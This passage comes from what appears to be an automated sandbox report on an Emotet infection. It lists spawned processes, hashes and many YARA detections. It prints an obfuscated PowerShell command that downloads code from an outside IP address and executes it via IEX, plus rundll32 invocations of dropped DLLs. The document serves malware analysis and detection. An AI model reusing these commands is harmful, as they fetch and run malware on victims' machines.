                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                    Imagebase:0x13ff60000
                                    File size:473600 bytes
                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Reputation:high

                                    General

                                    Target ID:8
                                    Start time:21:18:59
                                    Start date:28/01/2022
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                    Imagebase:0x4a6d0000
                                    File size:345088 bytes
                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:9
                                    Start time:21:18:59
                                    Start date:28/01/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                    Imagebase:0x4e0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.504836959.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high

                                    General

                                    Target ID:10
                                    Start time:21:19:03
                                    Start date:28/01/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                                    Imagebase:0x4e0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561150759.0000000002130000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561065386.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561626313.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561662235.0000000003181000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561110360.0000000002101000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561451631.0000000002871000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561377294.0000000002410000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561295967.00000000023A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.560945911.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561541228.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561700746.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561513666.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561271615.0000000002370000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561230347.00000000022F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high

                                    General

                                    Target ID:12
                                    Start time:21:19:26
                                    Start date:28/01/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVv
                                    Imagebase:0x4e0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.563589206.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.563561570.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                    Reputation:high

                                    General

                                    Target ID:13
                                    Start time:21:19:31
                                    Start date:28/01/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",DllRegisterServer
                                    Imagebase:0x4e0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620421483.0000000002651000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620926031.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.619911631.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620976859.0000000003111000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620028804.0000000000391000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620781732.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620753571.00000000028E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620558528.00000000027B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620134635.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.619872548.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.621014524.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620852430.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620492443.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.619980737.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620621291.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high

                                    General

                                    Target ID:14
                                    Start time:21:19:53
                                    Start date:28/01/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",NLOfvkgYs
                                    Imagebase:0x4e0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.623757227.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.623291568.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.623338464.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security

                                    General

                                    Target ID:15
                                    Start time:21:19:58
                                    Start date:28/01/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",DllRegisterServer
                                    Imagebase:0x4e0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679498941.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679023916.00000000004B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679099785.0000000000971000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679434577.00000000029E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679378273.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.684161589.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679539755.0000000002E71000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.678957905.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679306140.0000000002791000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679166369.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.678995791.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.678823543.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679074321.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                    Disassembly

                                    No disassembly